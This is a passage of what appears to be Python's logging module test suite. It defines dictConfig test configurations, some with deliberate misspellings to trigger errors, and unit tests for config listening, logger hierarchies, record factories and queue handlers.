'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
    """Hand *conf* (a dict) straight to logging.config.dictConfig()."""
    logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
    # config2's handler stream is 'ext://sys.stdbout' (a typo that cannot
    # be resolved), so dictConfig must raise.
    with self.assertRaises(Exception):
        self.apply_config(self.config2)
def test_config2a_failure(self):
    # config2a misspells the handler level as 'NTOSET', so dictConfig
    # must raise.
    with self.assertRaises(Exception):
        self.apply_config(self.config2a)
def test_config2b_failure(self):
    # config2b misspells the root level as 'WRANING', so dictConfig
    # must raise.
    with self.assertRaises(Exception):
        self.apply_config(self.config2b)
def test_config3_failure(self):
    # config3 references the undefined formatter 'misspelled_name', so
    # dictConfig must raise.
    with self.assertRaises(Exception):
        self.apply_config(self.config3)
    def test_config4_ok(self):
        """config4: a custom formatter class is used when formatting exceptions."""
        # A config specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4)
            #logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            # The custom formatter appends "Got a [<exc type>]" to the output.
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])

    def test_config4a_ok(self):
        """Same expectations as test_config4_ok, via the config4a variant."""
        # A config specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4a)
            #logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])
    def test_config5_ok(self):
        """config5 must produce the same observable behavior as config1."""
        self.test_config1_ok(config=self.config5)

    def test_config6_failure(self):
        """An invalid config (config6) must make dictConfig raise."""
        self.assertRaises(Exception, self.apply_config, self.config6)
    def test_config7_ok(self):
        """Re-applying a config disables loggers absent from the new config."""
        with support.captured_stdout() as output:
            self.apply_config(self.config1)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config7)
            logger = logging.getLogger("compiler.parser")
            # After config7 is applied, compiler.parser is expected to be
            # disabled (the new config does not keep it enabled).
            self.assertTrue(logger.disabled)
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '3'),
                ('ERROR', '4'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    # Same as test_config_7_ok but don't disable old loggers.
    def test_config_8_ok(self):
        """With disable_existing_loggers off, old loggers keep working."""
        with support.captured_stdout() as output:
            self.apply_config(self.config1)
            logger = logging.getLogger("compiler.parser")
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config8)
            logger = logging.getLogger("compiler.parser")
            # Unlike test_config7_ok, the pre-existing logger stays enabled.
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '3'),
                ('ERROR', '4'),
                ('INFO', '5'),
                ('ERROR', '6'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config_8a_ok(self):
        """Like test_config_8_ok, with a hyphenated logger name present.

        Regression test for issue #11424: 'compiler-hyphenated' sorts between
        'compiler' and 'compiler.xyz' and used to prematurely end the loop
        collecting child loggers of 'compiler'.
        """
        with support.captured_stdout() as output:
            self.apply_config(self.config1a)
            logger = logging.getLogger("compiler.parser")
            # See issue #11424. compiler-hyphenated sorts
            # between compiler and compiler.xyz and this
            # was preventing compiler.xyz from being included
            # in the child loggers of compiler because of an
            # overzealous loop termination condition.
            hyphenated = logging.getLogger('compiler-hyphenated')
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
                ('CRITICAL', '3'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config8a)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            # Will not appear
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '4'),
                ('ERROR', '5'),
                ('INFO', '6'),
                ('ERROR', '7'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_config_9_ok(self):
        """Incremental reconfiguration: output appears only once both the
        logger level and the handler level allow it."""
        with support.captured_stdout() as output:
            self.apply_config(self.config9)
            logger = logging.getLogger("compiler.parser")
            # Nothing will be output since both handler and logger are set to WARNING
            logger.info(self.next_message())
            self.assert_log_lines([], stream=output)
            self.apply_config(self.config9a)
            # Nothing will be output since handler is still set to WARNING
            logger.info(self.next_message())
            self.assert_log_lines([], stream=output)
            self.apply_config(self.config9b)
            # Message should now be output
            logger.info(self.next_message())
            self.assert_log_lines([
                ('INFO', '3'),
            ], stream=output)
    def test_config_10_ok(self):
        """Filters configured via the dict suppress matching loggers."""
        with support.captured_stdout() as output:
            self.apply_config(self.config10)
            logger = logging.getLogger("compiler.parser")
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler.lexer')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger("compiler.parser.codegen")
            # Output, as not filtered
            logger.error(self.next_message())
            self.assert_log_lines([
                ('WARNING', '1'),
                ('ERROR', '4'),
            ], stream=output)
    def test_config11_ok(self):
        """config11 must produce the same observable behavior as config1."""
        self.test_config1_ok(self.config11)

    def test_config12_failure(self):
        """An invalid config (config12) must make dictConfig raise."""
        self.assertRaises(Exception, self.apply_config, self.config12)

    def test_config13_failure(self):
        """An invalid config (config13) must make dictConfig raise."""
        self.assertRaises(Exception, self.apply_config, self.config13)
    def test_config14_ok(self):
        """config14 is expected to set custom attributes ('foo', 'terminator')
        on handler 'hand1'; the terminator must show up in the output."""
        with support.captured_stdout() as output:
            self.apply_config(self.config14)
            h = logging._handlers['hand1']
            self.assertEqual(h.foo, 'bar')
            self.assertEqual(h.terminator, '!\n')
            logging.warning('Exclamation')
            self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
    def test_config15_ok(self):
        """Re-applying a FileHandler config must not leak the previous stream
        (checked via check_no_resource_warning)."""
        def cleanup(h1, fn):
            h1.close()
            os.remove(fn)

        with self.check_no_resource_warning():
            fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
            os.close(fd)

            config = {
                "version": 1,
                "handlers": {
                    "file": {
                        "class": "logging.FileHandler",
                        "filename": fn
                    }
                },
                "root": {
                    "handlers": ["file"]
                }
            }

            # Applying twice: the second apply must close the first handler's
            # stream cleanly, otherwise a ResourceWarning is emitted.
            self.apply_config(config)
            self.apply_config(config)

        handler = logging.root.handlers[0]
        self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
    def test_listen_config_10_ok(self):
        """A JSON dict config sent over the listener socket takes effect."""
        with support.captured_stdout() as output:
            self.setup_via_listener(json.dumps(self.config10))
            logger = logging.getLogger("compiler.parser")
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger('compiler.lexer')
            # Not output, because filtered
            logger.warning(self.next_message())
            logger = logging.getLogger("compiler.parser.codegen")
            # Output, as not filtered
            logger.error(self.next_message())
            self.assert_log_lines([
                ('WARNING', '1'),
                ('ERROR', '4'),
            ], stream=output)

    def test_listen_config_1_ok(self):
        """An ini-style config sent over the listener socket takes effect."""
        with support.captured_stdout() as output:
            self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
    def test_listen_verify(self):
        """The listener's *verify* callable can reject or transform configs.

        Three scenarios: verification that fails (config ignored),
        no verification (config applied), and verification that reverses
        the bytes (reversed payload applied after transformation).
        """
        def verify_fail(stuff):
            # Returning None means "reject this config".
            return None

        def verify_reverse(stuff):
            # Returns the transformed (un-reversed) bytes to apply.
            return stuff[::-1]

        logger = logging.getLogger("compiler.parser")
        to_send = textwrap.dedent(ConfigFileTest.config1)

        # First, specify a verification function that will fail.
        # We expect to see no output, since our configuration
        # never took effect.
        with support.captured_stdout() as output:
            self.setup_via_listener(to_send, verify_fail)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
        self.assert_log_lines([], stream=output)
        # Original logger output has the stuff we logged.
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], pat=r"^[\w.]+ -> (\w+): (\d+)$")

        # Now, perform no verification. Our configuration
        # should take effect.
        with support.captured_stdout() as output:
            self.setup_via_listener(to_send)    # no verify callable specified
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '3'),
            ('ERROR', '4'),
        ], stream=output)
        # Original logger output still has the stuff we logged before.
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], pat=r"^[\w.]+ -> (\w+): (\d+)$")

        # Now, perform verification which transforms the bytes.
        with support.captured_stdout() as output:
            self.setup_via_listener(to_send[::-1], verify_reverse)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '5'),
            ('ERROR', '6'),
        ], stream=output)
        # Original logger output still has the stuff we logged before.
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], pat=r"^[\w.]+ -> (\w+): (\d+)$")
    def test_out_of_order(self):
        """Applying self.out_of_order must fully resolve forward references:
        the handler's target becomes a real Handler and the formatter uses
        StringTemplateStyle."""
        self.apply_config(self.out_of_order)
        handler = logging.getLogger('mymodule').handlers[0]
        self.assertIsInstance(handler.target, logging.Handler)
        self.assertIsInstance(handler.formatter._style,
                              logging.StringTemplateStyle)
    def test_baseconfig(self):
        """BaseConfigurator.convert resolves cfg:// URLs with indexing,
        nesting and dotted access, and raises on bad references."""
        d = {
            'atuple': (1, 2, 3),
            'alist': ['a', 'b', 'c'],
            'adict': {'d': 'e', 'f': 3 },
            'nest1': ('g', ('h', 'i'), 'j'),
            'nest2': ['k', ['l', 'm'], 'n'],
            'nest3': ['o', 'cfg://alist', 'p'],
        }
        bc = logging.config.BaseConfigurator(d)
        self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
        self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
        self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
        self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
        self.assertEqual(bc.convert('cfg://adict.d'), 'e')
        self.assertEqual(bc.convert('cfg://adict[f]'), 3)
        v = bc.convert('cfg://nest3')
        # Element 1 was the 'cfg://alist' reference, resolved to the list.
        self.assertEqual(v.pop(1), ['a', 'b', 'c'])
        self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
        self.assertRaises(ValueError, bc.convert, 'cfg://!')
        self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
    """Tests for logging.Manager's logger-class and record-factory hooks."""

    def test_manager_loggerclass(self):
        """setLoggerClass validates its argument and affects getLogger()."""
        logged = []

        class MyLogger(logging.Logger):
            # Capture messages instead of emitting them.
            def _log(self, level, msg, args, exc_info=None, extra=None):
                logged.append(msg)

        man = logging.Manager(None)
        # Classes that are not Logger subclasses are rejected.
        self.assertRaises(TypeError, man.setLoggerClass, int)
        man.setLoggerClass(MyLogger)
        logger = man.getLogger('test')
        logger.warning('should appear in logged')
        # Goes through the global root manager, not 'man'.
        logging.warning('should not appear in logged')

        self.assertEqual(logged, ['should appear in logged'])

    def test_set_log_record_factory(self):
        """setLogRecordFactory stores the factory on the manager."""
        man = logging.Manager(None)
        expected = object()
        man.setLogRecordFactory(expected)
        self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
    """Tests for Logger.getChild()."""

    def test_child_loggers(self):
        """getChild() returns the same object as getLogger() with the
        dotted name, for both root and non-root parents."""
        r = logging.getLogger()
        l1 = logging.getLogger('abc')
        l2 = logging.getLogger('def.ghi')
        c1 = r.getChild('xyz')
        c2 = r.getChild('uvw.xyz')
        self.assertIs(c1, logging.getLogger('xyz'))
        self.assertIs(c2, logging.getLogger('uvw.xyz'))
        c1 = l1.getChild('def')
        c2 = c1.getChild('ghi')
        c3 = l1.getChild('def.ghi')
        self.assertIs(c1, logging.getLogger('abc.def'))
        self.assertIs(c2, logging.getLogger('abc.def.ghi'))
        # Chained getChild() and a single dotted getChild() agree.
        self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
    """LogRecord subclass used to exercise setLogRecordFactory()."""
    pass
class LogRecordFactoryTest(BaseTest):
    """Tests for logging.setLogRecordFactory()."""

    def setUp(self):
        """Install a filter that raises TypeError on any record whose type
        is not DerivedLogRecord, and remember the original factory."""
        class CheckingFilter(logging.Filter):
            def __init__(self, cls):
                self.cls = cls

            def filter(self, record):
                t = type(record)
                if t is not self.cls:
                    msg = 'Unexpected LogRecord type %s, expected %s' % (t,
                            self.cls)
                    raise TypeError(msg)
                return True

        BaseTest.setUp(self)
        self.filter = CheckingFilter(DerivedLogRecord)
        self.root_logger.addFilter(self.filter)
        self.orig_factory = logging.getLogRecordFactory()

    def tearDown(self):
        """Remove the checking filter and restore the original factory."""
        self.root_logger.removeFilter(self.filter)
        BaseTest.tearDown(self)
        logging.setLogRecordFactory(self.orig_factory)

    def test_logrecord_class(self):
        """Before the factory is set the filter raises; after, logging works
        and emits records of the derived class."""
        self.assertRaises(TypeError, self.root_logger.warning,
                          self.next_message())
        logging.setLogRecordFactory(DerivedLogRecord)
        self.root_logger.error(self.next_message())
        self.assert_log_lines([
           ('root', 'ERROR', '2'),
        ])
class QueueHandlerTest(BaseTest):
    """Tests for logging.handlers.QueueHandler (and QueueListener)."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        """Create a dedicated 'que' logger at WARNING with a QueueHandler."""
        BaseTest.setUp(self)
        self.queue = queue.Queue(-1)
        self.que_hdlr = logging.handlers.QueueHandler(self.queue)
        self.name = 'que'
        self.que_logger = logging.getLogger('que')
        self.que_logger.propagate = False
        self.que_logger.setLevel(logging.WARNING)
        self.que_logger.addHandler(self.que_hdlr)

    def tearDown(self):
        self.que_hdlr.close()
        BaseTest.tearDown(self)

    def test_queue_handler(self):
        """Only records at or above the logger's level are enqueued."""
        self.que_logger.debug(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        self.que_logger.info(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        msg = self.next_message()
        self.que_logger.warning(msg)
        data = self.queue.get_nowait()
        self.assertTrue(isinstance(data, logging.LogRecord))
        self.assertEqual(data.name, self.que_logger.name)
        self.assertEqual((data.msg, data.args), (msg, None))

    def test_formatting(self):
        """QueueHandler formats the record before enqueueing: msg and
        message on the queued record hold the formatted text."""
        msg = self.next_message()
        levelname = logging.getLevelName(logging.WARNING)
        log_format_str = '{name} -> {levelname}: {message}'
        formatted_msg = log_format_str.format(name=self.name,
                                              levelname=levelname, message=msg)
        formatter = logging.Formatter(self.log_format)
        self.que_hdlr.setFormatter(formatter)
        self.que_logger.warning(msg)
        log_record = self.queue.get_nowait()
        self.assertEqual(formatted_msg, log_record.msg)
        self.assertEqual(formatted_msg, log_record.message)

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener(self):
        """QueueListener dispatches queued records to its handler; with
        respect_handler_level=True, the handler's own level is honored."""
        handler = support.TestHandler(support.Matcher())
        listener = logging.handlers.QueueListener(self.queue, handler)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
        self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
        handler.close()

        # Now test with respect_handler_level set
        handler = support.TestHandler(support.Matcher())
        handler.setLevel(logging.CRITICAL)
        listener = logging.handlers.QueueListener(self.queue, handler,
                                                  respect_handler_level=True)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        # WARNING/ERROR are below the handler's CRITICAL level, so dropped.
        self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
        self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
if hasattr(logging.handlers, 'QueueListener'):
    import multiprocessing
    from unittest.mock import patch

    class QueueListenerTest(BaseTest):
        """
        Tests based on patch submitted for issue #27930. Ensure that
        QueueListener handles all log messages.
        """
        repeat = 20

        @staticmethod
        def setup_and_log(log_queue, ident):
            """
            Creates a logger with a QueueHandler that logs to a queue read by a
            QueueListener. Starts the listener, logs five messages, and stops
            the listener.
            """
            logger = logging.getLogger('test_logger_with_id_%s' % ident)
            logger.setLevel(logging.DEBUG)
            handler = logging.handlers.QueueHandler(log_queue)
            logger.addHandler(handler)
            listener = logging.handlers.QueueListener(log_queue)
            listener.start()

            logger.info('one')
            logger.info('two')
            logger.info('three')
            logger.info('four')
            logger.info('five')

            listener.stop()
